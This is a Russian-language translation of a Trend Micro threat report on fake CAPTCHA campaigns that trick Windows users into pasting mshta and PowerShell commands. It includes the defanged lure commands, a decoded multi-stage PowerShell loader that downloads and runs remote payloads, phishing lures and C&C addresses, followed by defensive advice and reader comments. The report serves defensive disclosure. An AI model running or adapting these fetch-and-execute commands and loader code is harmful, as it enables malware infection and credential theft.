Краткое содержание

Trend™ Research обнаружила волну поддельных страниц CAPTCHA, которые обманывают пользователей, заставляя их вставлять вредоносные команды в диалоговое окно «Выполнить» (Windows Run). Эти кампании используют файлы (например, MP3, PDF) с внедрённым запутанным JavaScript, распространяемым через фишинговые письма, вредоносную рекламу (malvertising) или SEO-отравление. Загрузки исполняются в памяти с использованием mshta.exe или PowerShell, что позволяет часто обходить традиционную файловую детекцию. Эти атаки обеспечивают эксфильтрацию данных, кражу учётных данных, удалённый доступ, развертывание загрузчиков через такие вредоносные программы, как Lumma Stealer, Rhadamanthys, AsyncRAT, Emmenthal и XWorm.

Риски для бизнеса:

  • компрометация конечных устройств,

  • несанкционированный доступ к данным,

  • срыв операций из-за устойчивых бэкдоров и управляющих (C&C) каналов.

Наибольшую угрозу атаки представляют для организаций, работающих в среде Windows с минимальными ограничениями на выполнение скриптов. Кампании эксплуатируют сразу несколько легитимных платформ, включая сервисы обмена файлами, платформы контента и поиска, музыкальные репозитории, средства перенаправления URL и хостинги документов. Атаки основываются на доверии к CAPTCHA-интерфейсам и известным брендам.

Отключение доступа к диалоговому окну «Выполнить», ограничение доступа к публичным платформам обмена файлами и ужесточение настроек браузера могут значительно снизить риск воздействия этой угрозы. Ниже приведены рекомендации по смягчению рисков и обзор решений Trend Micro для защиты от подобных атак.

В последние месяцы в рамках расследований, проводимых службой Trend Micro™ Managed Detection and Response (MDR), зафиксирован существенный рост случаев атак с использованием поддельных CAPTCHA. Такие CAPTCHA попадают к пользователю через фишинговые письма, редиректы по URL, вредоносную рекламу (malvertising) или SEO-отравление. Во всех выявленных случаях наблюдается схожее поведение: пользователю предлагается скопировать и вставить вредоносную команду в окно «Выполнить» (Run) в Windows.

Сценарий далее использует Microsoft HTML Application Host (mshta) либо PowerShell с кодировкой base64, чтобы выполнить высоко запутанную команду, которая, в свою очередь, подключается к другому сайту и загружает многоступенчатые скрипты прямо в память.

Уникальное наблюдение в ходе анализа: такие сайты размещают специально сформированные .mp3-файлы, в которые внедрён и замаскирован JavaScript-код. Это запускает многоэтапный процесс, в результате которого происходит загрузка различных типов вредоносного ПО.

Рисунок 1. Обнаруженная цепочка атаки в кампаниях с поддельными CAPTCHA
Рисунок 1. Обнаруженная цепочка атаки в кампаниях с поддельными CAPTCHA

Первичный доступ (Initial Access)

Пользователь сталкивается со страницей CAPTCHA, имитирующей легитимную проверку на «человека», чаще всего при просмотре на первый взгляд безобидных сайтов с контентом. В некоторых случаях жертва попадает на такую страницу через фишинговую рассылку с перенаправлением по URL. Страница содержит инструкцию для пользователя — скопировать и вставить команду в окно «Выполнить» (Win + R) якобы в рамках процесса подтверждения. После запуска эта команда активирует вредоносный скрипт, который устанавливает на устройство различные типы вредоносного ПО.

Ниже приведены примеры команд, которые пользователям предлагалось выполнить (по данным нашего анализа):

  • mshta.exe hxxps://ernier[.]shop/lyricalsync[.]mp3 # ''Ι am nοt a rοbοt: САРТСНА Verification UID: 885203

  • mshta.exe hxxps://zb-files[.]oss-ap-southeast-1[.]aliyuncs[.]com/DPST_doc.mp3 #  ''Ι am nοt a rοbοt: САРТСНА Verification UID: 815403

  • mshta.exe hxxp://ok[.]fish-cloud-jar[.]us/ # "Authentication needed: Secure Code 3V8MUR-9PW4S"

  • mshta.exe hxxps://yedik[.]shop/Tech_House_Future[.]mp3 #  ''Ι am nοt a rοbοt: САРТСНА Verification UID: 885203

  • mshta.exe hxxps://x63-hello[.]live/nF3mXcQ9FVjs1sMt[.]html #'' I'm human ID241619''

  • mshta.exe hxxps://welcome12-world[.]com/wpDoQRpZt2PIffud[.]html #'' I'm human ID233560''

  • mshta.exe hxxps://w19-seasalt[.]com/mbDjBsRmxM1LreEp[.]html #'' I'm human ID984662''

  • PowerShell.exe -W Hidden -command $uri = 'hxxps[://]fessoclick[.]com/clck/dub.txt'; $content = (Invoke-WebRequest -Uri $uri).Content; Invoke-Expression $content”

  • cmd /c "powershell -w h -e aQBlAHgAKABpAHcAcgAgAC0AVQByAGkAIAAnAGgAdAB0AHAAcwA6AC8ALwB2AGkAZQB3AGUAcgAtAHYAYwBjAHAAYQBzAHMALgBjAG8AbQAvAGkAbgAuAHAAaABwAD8AYQBjAHQAaQBvAG4APQAxACcAKQA=" && ✅ I am not a robot - reCAPTCHA ID: 7845

  • mshta hxxps://check[.]nejyd[.]icu/gkcxv[.]google?i=db47f2d4-a1c2-405f-ba9f-8188d2da9156 REM ✅ Human, not a robot: Verification САРTCHA ID:658630

  • PoWeRsHeLl -w h -c cUr"L.E"x"E" -k -L hxxp"s://ka"j"e"c.icu"/f"04b18c2f7ff"48bdbf06"701"38"f9eb2"4f.txt | pow"e"rs"h"el"l" -

Анализ фишинговых писем показывает повторяющиеся тематические шаблоны. Темы сообщений часто ссылаются на забытые вещи гостей, создают ощущение срочности и апеллируют к вопросам безопасности или конфиденциальности. В письмах, как правило, упоминаются конкретные предметы, якобы оставленные отправителю, и используется официальный, деловой стиль, чтобы повысить доверие и побудить пользователя к немедленным действиям.

Примеры тем писем:

  • Требуется действие — Ценные вещи гостя оставлены

  • Требуется внимание: Найдены личный дневник и документы гостя

  • Критическое уведомление: Ячейка хранения гостя осталась незапертой

  • Срочное уведомление: Медицинское оборудование гостя оставлено на территории

  • Последняя попытка: Дорогие вещи гостя остались в номере — требуется немедленное действие

  • Оставленные вещи гостя на вашей территории — требуется немедленное внимание

  • Предмет высокого риска: Конфиденциальный ноутбук гостя остался без присмотра

  • Необходим немедленный контакт — Вещи гостя

  • Юридический и охранный вопрос: Паспорт гостя и иммиграционные документы забыты

  • Обновление «Потерянное и найденное»: Обнаружены электронные устройства гостя

  • Пожалуйста, свяжитесь с гостем — Забытые вещи

  • Переслано: Срочно — Найдены утерянные кредитные карты гостя

  • Оповещение безопасности: Ноутбук и телефон гостя остались на объекте

  • Срочно: Найдены утерянные кредитные карты гостя

  • Срочное внимание — Вещи гостя в вашем отеле

  • Срочный инцидент безопасности: Не востребованы удостоверяющие документы гостя

Встроенные URL-ссылки в каждом фишинговом письме эксплуатируют доверие к легитимным доменам, таким как https://xxx[.]51.ca и hxxps://www[.]xxxnet.dk, чтобы казаться надёжными для ничего не подозревающих пользователей. Однако при переходе по ним эти ссылки перенаправляют пользователя на фальшивые страницы с CAPTCHA, которые используются как прикрытие для атаки.

  • hxxps://sns[.]xx[.]ca/link[.]php?url=///guests-reservid[.]com

  • hxxps://sns[.]xx[.]ca/link[.]php?url=///guest-idreserve[.]com

  • hxxps://sns[.]xx[.]ca/link[.]php?url=///idguset-reserve[.]com

  • hxxps://sns[.]xx[.]ca/link[.]php?url=///guestdocfound[.]com

  • hxxps://sns[.]xx[.]ca/link[.]php?url=///itemsfoundguest[.]com

  • hxxps://sns[.]xx[.]ca/link[.]php?url=///guestitemsfound[.]com

  • hxxps://www[.]xxxnet[.]dk/out[.]php?link=///guests-reservid[.]com

В некоторых случаях фишинговые письма включают вложение в формате PDF вместо прямой ссылки в теле письма. При открытии такой PDF-файл перенаправляет пользователя на фальшивую страницу с CAPTCHA. В приведённом ниже примере PDF-документа пользователь оказывается на поддельной странице после нажатия на встроенную ссылку:hxxps://viewer-vccpass[.]com.

 Рисунок 2. Пример фишингового письма с PDF-вложением, содержащим ссылку на фальшивую CAPTCHA-страницу
Рисунок 2. Пример фишингового письма с PDF-вложением, содержащим ссылку на фальшивую CAPTCHA-страницу

Деятельность была зафиксирована с помощью телеметрии Trend Vision One, что позволило провести более глубокий анализ влияния каждого инцидента. В другом примере, представленном ниже, переход по ссылке из письма, полученного в Outlook, запускает браузер Microsoft Edge и перенаправляет пользователя на фальшивую CAPTCHA-страницу:guest-idreserve[.]com.

Рисунок 3. Запуск mshta через окно «Выполнить» для исполнения HTML-приложения
Рисунок 3. Запуск mshta через окно «Выполнить» для исполнения HTML-приложения

Злоумышленники также используют SEO-отравление (SEO poisoning), чтобы заманивать жертв на фальшивые страницы с CAPTCHA. В одном из случаев пользователь искал в Google информацию о «Longleat House».

Анализ истории браузера с помощью форензик-модуля в Trend Vision One позволил точно установить поисковый запрос: «Longleat House Entrance».

Как показано на рисунке 5, при поиске этой фразы в результатах появлялся один из первых сайтов, — взломанный легитимный ресурс, который перенаправлял пользователя на поддельную CAPTCHA-страницу.

Рисунок 4. История браузера, демонстрирующая использование SEO-отравления
Рисунок 4. История браузера, демонстрирующая использование SEO-отравления
Рисунок 5. Поддельная CAPTCHA-страница, появляющаяся в верхней части результатов поиска Google в результате применения методов SEO-отравления
Рисунок 5. Поддельная CAPTCHA-страница, появляющаяся в верхней части результатов поиска Google в результате применения методов SEO-отравления

Переход на сайт приводит пользователя на фальшивую страницу с CAPTCHA, которая инструктирует вставить замаскированную вредоносную команду в окно «Выполнить» (Run). После выполнения эта команда запускает удалённый скрипт напрямую в памяти, минуя файловую систему.

Рисунок 6. Фальшивая CAPTCHA-страница, занявшая высокую позицию в результатах поиска Google
Рисунок 6. Фальшивая CAPTCHA-страница, занявшая высокую позицию в результатах поиска Google

Для наглядности мы сосредоточимся на анализе атак с поддельной CAPTCHA, в которых вредоносные скрипты встраиваются в MP3-файлы, поскольку такая техника является уникальной. Хотя конкретные скрипты и этапы могут различаться от случая к случаю, общая структура и поведение остаются одинаковыми.

Согласно телеметрии, mshta запускает файл lyricalsync.mp3 — специально сформированный MP3-файл, размещённый на ресурсе:hxxps://ernie[.]shop.

File path: C:\Windows\System32\mshta.exe"C:\WINDOWS\system32\mshta.exe" hxxps://ernier[.]shop/lyricalsync.mp3 # ''Ι am nοt a rοbοt: САРТСНА Verification UID: 885203C:\Users\srt\AppData\Local\Microsoft\Windows\INetCache\IE\TKYD709X\lyricalsync.mp3

Рисунок 7. Запуск mshta через окно «Выполнить» для исполнения MP3-файла с внедрённым JavaScript
Рисунок 7. Запуск mshta через окно «Выполнить» для исполнения MP3-файла с внедрённым JavaScript

Согласно данным Threat Intelligence, были выявлены несколько URL-источников перехода (referrer URLs), связанных с hxxps://ernier[.]shop/lyricalsync[.]mp3. Переход по этим ссылкам приводит пользователя на страницы с поддельной CAPTCHA, где ему предлагается скопировать и вставить вредоносную команду в окно «Выполнить» (Run). Такое поведение сохраняется во всех изученных нами случаях.

Хотя конкретные URL-адреса, на которых размещён MP3-файл, могут отличаться, каждый из них содержит referrer-ссылку, которая в итоге перенаправляет пользователя на поддельную CAPTCHA-страницу.

Рисунок 8. Referrer-URL-адреса для hxxps://ernier[.]shop/lyricalsync[.]mp3
Рисунок 8. Referrer-URL-адреса для hxxps://ernier[.]shop/lyricalsync[.]mp3

Переход по одному из этих referrer-URL-адресов приводит пользователя на фальшивую CAPTCHA-страницу, где отображаются такие надписи, как «Verify You Are Human» (Подтвердите, что вы человек), «I'm not a robot» (Я не робот)

Рисунок 9. Перенаправление на фальшивую CAPTCHA-страницу с просьбой «Подтвердите, что вы человек»
Рисунок 9. Перенаправление на фальшивую CAPTCHA-страницу с просьбой «Подтвердите, что вы человек»

Когда пользователь нажимает кнопку «I'm not a robot» (Я не робот), ему предлагается скопировать и выполнить вредоносный код на своём устройстве. В приведённом примере на экране отображается следующее:

Рисунок 10. Этапы «проверки» на странице с инструкцией открыть окно «Выполнить» и вставить команду
Рисунок 10. Этапы «проверки» на странице с инструкцией открыть окно «Выполнить» и вставить команду

Как и в других кампаниях с поддельными CAPTCHA, злоумышленники активно обновляют как URL-адреса, так и скрипты, размещённые на этих сайтах. Как показано на рисунке 11, всего через один день после первичного анализа был использован уже другой URL, и внешний вид страницы также изменился. Эта тактика позволяет сохранять непрерывность операции: если один URL блокируется или удаляется, атака быстро переносится на новый адрес, продолжая действовать без перерыва.

Рисунок 11. Злоумышленники обновляют URL, размещающий вредоносные скрипты
Рисунок 11. Злоумышленники обновляют URL, размещающий вредоносные скрипты

Каждая поддельная CAPTCHA-страница содержит скрипт, который динамически генерирует и копирует в буфер обмена команду mshta. Эта команда указывает на удалённый сайт, где размещён вредоносный HTA- или MP3-файл. Команда закодирована в Base64 и использует JavaScript для автоматической декодировки и копирования в буфер обмена.

Рисунок 12. Поддельная CAPTCHA-страница содержит запутанный JavaScript-код, который автоматически декодирует команду, закодированную в Base64, и копирует её в буфер обмена
Рисунок 12. Поддельная CAPTCHA-страница содержит запутанный JavaScript-код, который автоматически декодирует команду, закодированную в Base64, и копирует её в буфер обмена

Файл lyricalsync.mp3 содержит JavaScript с многоступенчатым кодированием: сначала в Base64, затем в шестнадцатеричном формате. На первый взгляд, это обычный аудиофайл — при воспроизведении звучит песня “Done With You” группы Reign on Me.

Рисунок 13. MP3-файл воспроизводит трек “Done With You” группы Reign on Me
Рисунок 13. MP3-файл воспроизводит трек “Done With You” группы Reign on Me

В некоторых случаях аудиофайл напрямую встроен в веб-страницу.

Рисунок 14. MP3-файл
Рисунок 14. MP3-файл

Анализ заголовков MP3-файлов из различных случаев выявил общую закономерность: многие из них, по-видимому, были получены с сайта бесплатной музыки www[.]jamendo[.]com. Злоумышленники, судя по всему, загружают легитимные аудиофайлы, внедряют в них вредоносный JavaScript и используют как средство доставки вредоносного ПО.

Рисунок 15. Заголовок MP3-файлов с повторяющимся признаком наличия jamendo[.]com
Рисунок 15. Заголовок MP3-файлов с повторяющимся признаком наличия jamendo[.]com

Файл lyricalsync.mp3 содержит запутанный JavaScript-код (обнаруживается как Trojan.JS.EMMENHTAL.SM). При запуске через mshta активируется этот скрипт, который проходит через несколько этапов дешифровки перед тем, как выполнить основной вредоносный код. Аналогичные техники были выявлены и в других инцидентах.

Рисунок 16. Фрагмент встроенного обфусцированного скрипта в файле lyricalsync.mp3
Рисунок 16. Фрагмент встроенного обфусцированного скрипта в файле lyricalsync.mp3

Когда файл lyricalsync.mp3 запускается через mshta, активируется многоступенчатый процесс деобфускации, специально разработанный для обхода механизмов обнаружения. Ниже представлен пример:

Скрипт первого уровня (кодировка Base64):

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -nop -ep un -E JABSAHgAVQB6ACAAPQAgACcANgA5ADYANQA3ADgANQAzADcANAA2ADEANwAyADcANAAyAEQANQAwADcAMgA2AEYANgAzADYANQA3ADMANwAzADIAMAAyADIAMgA0ADYANQA2AEUANwA2ADMAQQA1ADcANAA5ADQARQA0ADQANAA5ADUAMgA1AEMANQAzADcAOQA3ADMANQA3ADQARgA1ADcAMwA2ADMANAA1AEMANQA3ADYAOQA2AEUANgA0ADYARgA3ADcANwAzADUAMAA2AEYANwA3ADYANQAv <redacted>

Скрипт второго уровня (шестнадцатеричная кодировка):

$RxUz = '69657853746172742D50726F63657373202224656E763A57494E4449525C537973574F5736345C57696E646F7773506F7765725368656C6C5C76312E305C706F7765727368656C6C2E65786522202D417267756D656E744C69737420272D4E6F50726F66696C65272C272D457865637574696F6E506F6C696379272C27556E72657374726963746564272C272D436F6D6D616E64272C27535620396620285B4E65742E576<redacted>' -split '(.{2})' | Where-Object {$_} | ForEach-Object {[char]([convert]::ToInt32($_,16))};$RxUz = $RxUz -join ''; & $RxUz.Substring(0,3) $RxUz.Substring(3)

Итоговый полностью декодированный скрипт:

iex "Start-Process \"$env:WINDIR\SysWOW64\WindowsPowerShell\v1.0\powershell.exe\" -ArgumentList '-NoProfile','-ExecutionPolicy','Unrestricted','-Command','SV 9f ([Net.WebClient]::New());SV 09h ''https://bi[.]yuoie[.]shop/750413b4e6897a671bc759e04597952a0be747830189873b.xlsx'';Set-Item Variable:/Ob9 (((( [Net.WebClient]::New()|Member)|Where-Object{(Get-ChildItem Variable:_).Value.Name-like'*nl*g*'}).Name));(Variable utit).Value|ForEach-Object{(Get-ChildItem Variable:_).Value.InvokeCommand.( ( (Variable utit).Value.InvokeCommand.PsObject.Methods|Where-Object{(Get-ChildItem Variable:_).Value.Name-like'*k*ript*'}).Name)}( (9f).Value.(GCI Variable:\Ob9).Value)(Item Variable:09h).Value}' -WindowStyle Hidden;$yiZLHS = $env:AppData;function qhlncfrI($oDusI, $lHglEMM){curl $oDusI -o $lHglEMM};function WpKhSwg(){function ELPZqDpBs($rurDrA){if(!(Test-Path -Path $lHglEMM)){qhlncfrI $rurDrA $lHglEMM}}}WpKhSwg;

Итоговый декодированный PowerShell-скрипт сначала запускает новый процесс PowerShell с политикой выполнения Unrestricted и без использования пользовательского профиля (-NoProfile), чтобы обойти механизмы обнаружения. Далее он создаёт объект WebClient для подключения и загрузки файла с внешнего URL: https://bi.yuoie[.]shop/750413b4e6897a671bc759e04597952a0be747830189873b.xlsx.

На момент анализа этот файл содержал ещё один сильно обфусцированный PowerShell-скрипт. Файл загружается по локальному пути, предположительно в директорию данных приложений текущего пользователя :

path: C:\Users\<username>\AppData\Roaming\750413b4e6897a671bc759e04597952a0be747830189873b.xlsx

Чтобы избежать обнаружения, скрипт выполняется в скрытом окне. В его структуре предусмотрены функции, которые проверяют, существует ли целевой файл по указанному пути, если файл отсутствует, используют псевдоним curl в PowerShell для его загрузки.

Рисунок 17. PowerShell-скрипт (замаскированный под файл XLSX), устанавливающий соединение с известными вредоносными доменами
Рисунок 17. PowerShell-скрипт (замаскированный под файл XLSX), устанавливающий соединение с известными вредоносными доменами

Файл PowerShell-скрипта с именем 750413b4e6897a671bc759e04597952a0be747830189873b.xlsx, замаскированный под документ Excel, при выполнении устанавливал соединение со следующими доменами:

  • buyvault[.]shop

  • bi.yuoei[.]shop

Затем выполняется инъекция кода в svchost.exe, который запускает легитимный файл C:\Windows\System32\OOBE-Maintenance.exe. Этот файл используется для подключения к следующему серверу управления и контроля (C&C): 176[.]65[.]141[.]165:8587.

Далее запускается браузер на основе Chromium (например, Google Chrome) с использованием временного пользовательского профиля, расположенного по пути C:\Users\srt\AppData\Local\Temp\chrxxxx.tmp. При этом отключается GPU, разрешается порт 8000, и открывается потенциально вредоносный локальный веб-сервер на 127.0.0.1:8000, предположительно являющийся частью C&C-коммуникаци:

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe--user-data-dir="C:\Users\srt\AppData\Local\Temp\chr18E2.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/356e38cd/8ed4f620"

C:\Program Files\Google\Chrome\Application\chrome.exe
--user-data-dir="C:\Users\srt\AppData\Local\Temp\chr4D53.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "
http://127.0.0.1:8000/356e38cd/30a0f650"

Помимо Lumma Stealer, было зафиксировано вмешательство в процесс C:\Program Files\Windows Media Player\wmplayer.exe, который затем создавал AvastBrowserUpdate.exe и загружал вредоносную библиотеку goopdate.dll. Для выполнения вредоносного кода использовалась техника DLL sideloading. Данный компонент был классифицирован как PUA.Win32.FakeGoop.A.component:

  • C:\Users\srt\AppData\Roaming\IPEvcon\AvastBrowserUpdate.exe

  • C:\Users\srt\AppData\Roaming\IPEvcon\goopdate.dll (3e2794400664f6ae9a9b27821bf01ca008f99e1d)

 Рисунок 18. Визуализация того, как OOBE-Maintenance и wmplayer.exe использовались для сброса файлов с целью выполнения DLL sideloading
Рисунок 18. Визуализация того, как OOBE-Maintenance и wmplayer.exe использовались для сброса файлов с целью выполнения DLL sideloading

В другом случае мы наблюдали, что закодированный MP3-файл обращался к другому URL для загрузки и выполнения ещё одного сильно обфусцированного скрипта PowerShell. Он связывался с файлообменным сайтом MediaFire (download2431[.]mediafire[.]com), чтобы загрузить полезную нагрузку второго этапа, которая в итоге приводила к запуску Lumma Stealer.

Рисунок 19. Схема подключения к Mediafire для загрузки Lumma Stealer
Рисунок 19. Схема подключения к Mediafire для загрузки Lumma Stealer

Атрибуция полезной нагрузки

Наш анализ техники фальшивых CAPTCHA выявил разнообразные, но взаимосвязанные индикаторы компрометации (IoC), связанные с рядом известных семейств вредоносного ПО. Используя перекрёстные связи между URL-адресами и телеметрию VirusTotal, мы установили с высокой степенью уверенности связи между инфраструктурой доставки и различными семействами вредоносов. Этот метод позволил выявить кластеры, связанные с Lumma Stealer, Emmenhtal, Rhadamanthys, AsyncRAT и XWorm. Ниже приведён обзор того, как эти IoC связаны с каждым из обнаруженных в кампании вредоносных образцов:

Lumma Stealer: Несколько URL-адресов, связанных через граф связей в VirusTotal, указывают на известные узлы распространения Lumma Stealer.

Рисунок 20. Связь Lumma Stealer с обнаруженными индикаторами компрометации (IoC)
Рисунок 20. Связь Lumma Stealer с обнаруженными индикаторами компрометации (IoC)

Emmenhtal: Привязка к вредоносному ПО Emmenhtal основана на выявленных совпадениях в инфраструктуре командных серверов (C&C) и механизмах доставки вредоносов. Элементы, обнаруженные в рамках текущей кампании, совпадают с ранее задокументированными индикаторами, связанными с активностью Emmenhtal, что усиливает обоснованность данной атрибуции.

Рисунок 21. Связь Emmenhtal с зафиксированными индикаторами компрометации (IoCs)
Рисунок 21. Связь Emmenhtal с зафиксированными индикаторами компрометации (IoCs)

Rhadamanthys: Связь с этим вредоносным ПО подтверждается совпадениями в инфраструктуре, выявленными на основе исторических загрузок вредоносных файлов и связей между хранилищами. Изображение ниже демонстрирует эти взаимосвязи, укрепляя атрибуцию к известной активности Rhadamanthys.

Рисунок 22. Связь Rhadamanthys с зафиксированными индикаторами компрометации (IoCs)
Рисунок 22. Связь Rhadamanthys с зафиксированными индикаторами компрометации (IoCs)

AsyncRAT / XWorm: общий URL-адрес доставки 185[.]7[.]214[.]108/a[.]mp4 используется для размещения вредоносных загрузчиков, идентифицированных как AsyncRAT и XWorm. Анализ графа связей в VirusTotal подтвердил, что данный IP-адрес многократно применялся для хостинга удалённых троянов (RAT) и легковесных дропперов, что указывает на использование мультипейлоадных или модульных загрузчиков в зависимости от среды целевой системы.

Рисунок 23. Связь AsyncRAT/XWorm с зафиксированными индикаторами компрометации (IoCs)
Рисунок 23. Связь AsyncRAT/XWorm с зафиксированными индикаторами компрометации (IoCs)

Рекомендации по обеспечению безопасности от атак с поддельными CAPTCHA

Кампании с использованием фальшивых CAPTCHA продолжают развиваться, демонстрируя всё большую изощрённость. Злоумышленники применяют продвинутые приёмы, включая многоступенчатую обфускацию, исполнение скриптов в памяти и, в отдельных случаях, внедрение зашифрованного JavaScript в безобидные на вид MP3-файлы. Основные каналы доставки — фишинговые письма с вредоносными ссылками или вложениями, а также вредоносная реклама на ненадёжных сайтах.

Независимо от точки входа, цепочка атаки, как правило, базируется на обфусцированных JavaScript- или PowerShell-скриптах, предназначенных для извлечения и выполнения различных вредоносных нагрузок. Часто они распространяются через загрузчики вроде Emmenhtal, которые затем загружают вредоносы-крадоны (Lumma Stealer, Rhadamanthys) или RAT-инструменты (AsyncRAT, XWorm).

Ожидается, что в будущем злоумышленники будут внедрять полезные нагрузки и в другие нестандартные форматы помимо MP3 и HTA. Хотя фишинг и вредоносная реклама по-прежнему остаются основными методами распространения, возможен переход к платформам социальных сетей и мессенджерам с использованием сокращённых или замаскированных ссылок.

Продолжительное использование mshta.exe и PowerShell обусловлено их наличием во многих средах. Однако в будущем возможна активизация применения других системных утилит (LOLBins) для обхода защит, таких как rundll32 и regsvr32.

Лучшие практики защиты от атак с поддельными CAPTCHA:

  • Отключите доступ к диалогу «Выполнить» (Win + R).
    В средах, где важно ограничить доступ к административным инструментам и выполнение скриптов, рекомендуется запретить запуск диалога «Выполнить». Это снижает риск выполнения вредоносных команд PowerShell или MSHTA и ограничивает злоупотребление встроенными средствами Windows.

  • Применяйте принцип наименьших привилегий.
    Помимо блокировки «Выполнить», предоставляйте пользователям только необходимые права доступа. Это включает запрет на запись и выполнение в чувствительных каталогах, отключение выполнения скриптов, где это не требуется, и запрет повышения привилегий до администратора без утверждённого процесса. Снижение уровня привилегий ограничивает возможности как пользователей, так и вредоносного ПО по внесению критических изменений.

  • Ограничьте доступ к несанкционированным инструментам и платформам обмена файлами.
    Поддерживайте список утверждённого ПО и блокируйте доступ к публичным файлообменникам, если они не требуются для работы. Это минимизирует риск загрузки вредоносного контента и мешает злоумышленникам распространять дополнительные компоненты.

  • Мониторьте подозрительное поведение буфера обмена и процессов.
    Атаки показали, что пользователи могут быть вынуждены вставить и выполнить вредоносную команду из буфера обмена. Отслеживание аномальной активности — таких как закодированные команды или подозрительные скрипты — может служить ранним индикатором угрозы. Также необходимо отслеживать поведение процессов: медиа-плееры или браузеры, запускающие неожиданные исполняемые файлы или интерпретаторы скриптов, могут указывать на доставку вредоносной нагрузки.

  • Ужесточите настройки браузера.
    Настройте браузеры для защиты от SEO-подмены, вредоносной рекламы и скриптовых атак. Это включает блокировку выполнения JavaScript на ненадёжных сайтах, включение фильтров рекламы, отключение автозапуска и смешанного контента, удаление лишних расширений — особенно устаревших или с повышенными правами.

  • Включите функции защиты памяти.
    В Windows есть встроенные механизмы, которые позволяют выявлять выполнение кода в памяти, инъекции DLL и другие уклоняющиеся техники. Эти механизмы защищают от многоступенчатых атак без файлов, обходящих классические антивирусные решения.

Комментарии (8)


  1. anzay911
    04.07.2025 23:42

    Думал, он сам по клику это делает. А тут квест для неленивых.


    1. HardWrMan
      04.07.2025 23:42

      Ну да, древний анекдот типа "Привет! Я ленивый хакер, скачай мой вирус и запусти его!" стал реальностью.


      1. AuToMaton
        04.07.2025 23:42

        Не было такого анекдота. Был «Я тоже хакер, пожалуйста, сотри все бэкапы и отформатируй диск».


        1. RoasterToaster
          04.07.2025 23:42

          В частности, в интернете встречаются версии этого анекдота, датируемые 1995 годом


  1. RoasterToaster
    04.07.2025 23:42

    Еще некоторых просят запустить в powershell

    irm https://get.activated.win |

    Но пока непонятно, как этот вирус работает)


  1. LinkToOS
    04.07.2025 23:42

    Это двойная капча. Она отличает не только роботов от человеков, но еще и нормальных человеков от тупых человеков.

    "Переведите 100 рублей на счет ххххххх, чтобы подтвердить что вы человек.
    Мы поймем что вы не робот, потому что только люди могут попасться на такой тупой развод."


    1. HardWrMan
      04.07.2025 23:42

      Отправь 10 сообщений "Я не лох!" на короткий номер 2654. Докажи, что ты не лох!


  1. llllXl
    04.07.2025 23:42

    По заголовку уже подумал что прибавится очередная фобия, но почитав, понял, что еще можно спать спокойно